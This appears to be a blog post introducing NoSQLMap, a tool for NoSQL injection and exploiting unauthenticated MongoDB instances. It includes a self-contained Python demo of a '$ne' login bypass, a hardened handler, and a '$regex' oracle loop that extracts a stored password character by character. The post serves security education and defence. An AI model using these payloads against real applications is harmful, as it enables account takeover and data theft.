NoSQL database enumeration and exploitation with NoSQLMap

Like sqlmap, but for non-relational databases!

NoSQLMap is a tool designed to audit for, and automate, injection attacks against web applications that use NoSQL databases, and to exploit default-configuration weaknesses in the databases themselves (for example, a MongoDB instance that is reachable over the network and accepts unauthenticated connections), in order to disclose or clone data from the database.
The tool's exploits currently target MongoDB and CouchDB; support for other NoSQL platforms such as Redis and Cassandra is planned for future releases.
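The web-application side of this is operator injection: a handler that passes decoded JSON straight into a MongoDB query lets the client turn a string field into an operator document such as {"$ne": ""}. The script below is an added example, not NoSQLMap's code and not from the original post. It uses a hypothetical login handler, a constructed USERS collection, and a deliberately minimal re-implementation of three MongoDB operators ($ne, $gt, $regex) so that it runs without a database; everything named here is an assumption for the demo. It shows the authentication bypass NoSQLMap's web mode tests for, the same handler hardened, and, going one step beyond a plain bypass, how the vulnerable handler can be used as a yes/no oracle to recover a stored value with $regex prefix probes.

```python
import re

# Constructed sample collection standing in for the application's users
# collection; the values are made up for this demo.
USERS = [
    {"user": "admin", "pass": "s3cret!"},
    {"user": "alice", "pass": "hunter2"},
]

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789!"


def _match_field(value, cond):
    """Minimal stand-in for MongoDB field matching: a literal is compared for
    equality, a dict is treated as an operator document ($ne, $gt, $regex)."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$gt":
            if not value > arg:
                return False
        elif op == "$regex":
            if re.search(arg, value) is None:
                return False
        else:
            raise ValueError("unsupported operator: %s" % op)
    return True


def find_one(query):
    """Return the first document matching every field in the query, or None."""
    for doc in USERS:
        if all(_match_field(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Hypothetical login handler that drops the decoded JSON body straight
    into the query. A client that sends an object where a string is expected
    turns that value into a query operator."""
    return find_one({"user": body["user"], "pass": body["pass"]})


def login_hardened(body):
    """Same handler with the fix: only strings may reach the query, so operator
    documents are rejected before they are interpreted."""
    user, password = body["user"], body["pass"]
    if not isinstance(user, str) or not isinstance(password, str):
        return None
    return find_one({"user": user, "pass": password})


def extract_password(user, charset=CHARSET, max_len=32):
    """Recover a user's stored password one character at a time, using the
    vulnerable handler as a yes/no oracle through $regex prefix matches."""
    prefix = ""
    while len(prefix) < max_len:
        # An anchored exact match means the whole value has been recovered.
        if login_vulnerable({"user": user, "pass": {"$regex": "^" + re.escape(prefix) + "$"}}):
            return prefix
        for ch in charset:
            probe = {"user": user, "pass": {"$regex": "^" + re.escape(prefix + ch)}}
            if login_vulnerable(probe):
                prefix += ch
                break
        else:
            return None  # no character in the charset extends the prefix
    return None


if __name__ == "__main__":
    # {"$ne": ""} matches any non-empty password, so the first user is returned.
    print(login_vulnerable({"user": "admin", "pass": {"$ne": ""}}))
    print(login_hardened({"user": "admin", "pass": {"$ne": ""}}))
    print(extract_password("admin"))
```

The fix is a type check, not escaping: with a real driver the same payload arrives as a parsed JSON object, and the only reliable defence is to refuse anything that is not the scalar type the field expects (or to coerce it with str()) before it is placed in the query.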

NoSQLMap is written in Python, originally by Russell Butturini (tcstool) and now maintained by Michael Skelton (codingo), and is named as a tribute to Bernardo Damele and Miroslav Stampar's popular SQL injection tool sqlmap.

Its concepts are based on and extensions of Ming Chow’s presentation at Defcon 21, “Abusing NoSQL Databases”:

https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf

Installation

NoSQLMap is Python 2 code, so call the setup.py script with a Python 2.7 interpreter:

python setup.py install

If run with root privileges, setup.py tries (on Debian- and RedHat-based systems) to install these dependencies automatically:

  • Metasploit Framework
  • Python with PyMongo
  • httplib2
  • urllib
  • A local, default MongoDB instance (used as the destination when cloning data from a target)

Note that an unauthenticated, default MongoDB instance is exactly the weakness the tool exploits, so keep the local one bound to 127.0.0.1 or enable authentication on it before leaving it running on a shared network.

How does it work?

Here is a short demo video of NoSQLMap being used to exploit the default security model of a MongoDB server, that is, an instance reachable over the network with authentication left disabled:


More information and downloads

https://github.com/codingo/NoSQLMap
